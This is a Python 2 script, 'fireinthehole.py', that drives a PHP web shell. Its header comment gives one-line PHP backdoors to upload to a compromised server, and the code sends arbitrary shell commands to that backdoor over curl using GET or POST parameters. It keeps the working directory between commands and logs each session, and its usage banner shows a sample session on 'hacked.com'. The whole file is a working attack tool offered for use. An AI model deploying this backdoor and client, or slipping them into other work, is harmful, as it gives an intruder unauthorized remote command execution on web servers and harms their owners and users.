#!/usr/bin/python
#
# Malformation's Interactive HTTP GET and POST Shell - fireinthehole.py
#
# Upload something like this to a php file:
# <?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?>
# <?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>
#
# Kisses go to .aware, OTW, STS, darkc0de, str0ke and some Aussies
# Please don't strip the credits out if you modify or redistribute.

import sys, os, time

print '''
	Malformation's Interactive HTTP GET and POST Shell
	Version - 1.0.0a

	Tries to maintain current working directory when you use 'cd'.
	
	Usage:
	\tEnter the host => hacked.com/hacked.php
	\tEnter the POST variable => cmd
	\thacked.com/hacked.php# ls -la
	\ttotal 12880
	\tdrwxr-xr-x  2 web    web        4096 2009-11-03 11:54 .
	\tdrwxr-xr-x 15 root    root        4096 2009-10-08 13:37 ..
	\t-rw-r--r--  1 web    web         481 2009-11-02 18:58 hacked.php
	\thacked.com/hacked.php# .
	\tBye.
'''

# # # # # Configuration # # # # # #
# 0 to turn off curl verbosity    #
debug = 1                         #
# # # # # # # # # # # # # # # # # #

write = 0
curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"]
curl_dirs = ""
count = 0
finalcommand = ""
dir_array = []

for i in range(0,len(curl_array)):
	if (os.path.exists(curl_array[i] + "curl")):
		count = count + 1
		curl_dirs = curl_dirs + curl_array[i] + " "

if (count == 0):
	print "Couldn't find curl. Tried looking in " + curl_dirs
	sys.exit(0)
	
try:
	if (os.path.exists("fireinthehole.txt")):
		file = open("fireinthehole.txt","a")
	else:
		file = open("fireinthehole.txt","w")
	print "Output will be saved to fireinthehole.txt"
	write = 1
except IOError:
	print "Directory not writable, output will not be saved."

try:
	host = raw_input("Enter the host => ")
	method = raw_input("GET/POST => ")
	if (method == "GET"):
		myvar = raw_input("Enter the GET variable => ")
	elif (method == "POST"):
		myvar = raw_input("Enter the POST variable => ")
	else:
		sys.exit(0)
	while True:
		mycommand = raw_input(host + "# ")
		finalcommand = ""
		if (mycommand == "."):
			print "Bye."
			sys.exit(0)
		mycommand = mycommand + "; "
		if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "):
			dir_array.insert(len(dir_array) + 1, mycommand)
			if (method == "GET"):
				string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + "\""
			else:
				string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
			if (debug == 1):
				print string + ":\n"
			continue
		if (len(dir_array) != 0):
			for j in range(0,len(dir_array)):
				finalcommand = finalcommand + dir_array[j]
			finalcommand = finalcommand + mycommand
		if (finalcommand != ""):
			mycommand = finalcommand
		if (method == "GET"):
			string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + "\""
		else:
			string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
		if (debug == 1):
			print string + ":\n"
		command = os.popen(string,"r")
		if (write == 1):
			file.write(host + "# " + mycommand + "\n")
		while(1):
			line = command.readline()
			line = line.strip()
			if line:
				print line
				if (write == 1):
					file.write(line + "\n")
			else:
				break
except KeyboardInterrupt:
	print "\nBye."
	sys.exit(0)

except:
	print "Unhandled exception"
	sys.exit(0)